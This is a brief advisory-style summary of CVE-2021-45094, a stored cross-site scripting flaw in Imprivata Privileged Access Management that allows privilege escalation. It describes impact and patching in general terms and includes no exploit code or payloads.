CVE-2021-45094

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in Imprivata Privileged Access Management (formerly Xton PAM), version 2.3.202112051108 [1]. The vulnerability is present in at least two areas of the application, allowing injection of arbitrary JavaScript that is stored and executed when other users access the affected pages [1].

Exploitation

An attacker with a low-privileged account can inject malicious script into input fields that are not properly sanitized. When an administrator or other user views the affected area, the script executes in their browser context [1]. The researcher demonstrated that this can be used to escalate privileges, though the exact steps required bypass restrictions imposed by an initial incomplete patch [1].

Impact

Successful exploitation allows the attacker to escalate from a low-privileged user to System Administrator, gaining full control over the PAM instance and access to managed secrets and sessions [1]. This compromises confidentiality, integrity, and availability of the system and its managed resources.

Mitigation

Imprivata released a patch for this vulnerability, but the initial patch did not fully address the issue in all affected areas [1]. Users should contact Imprivata support to obtain the latest patched version and apply it promptly. No workarounds have been publicly documented [1].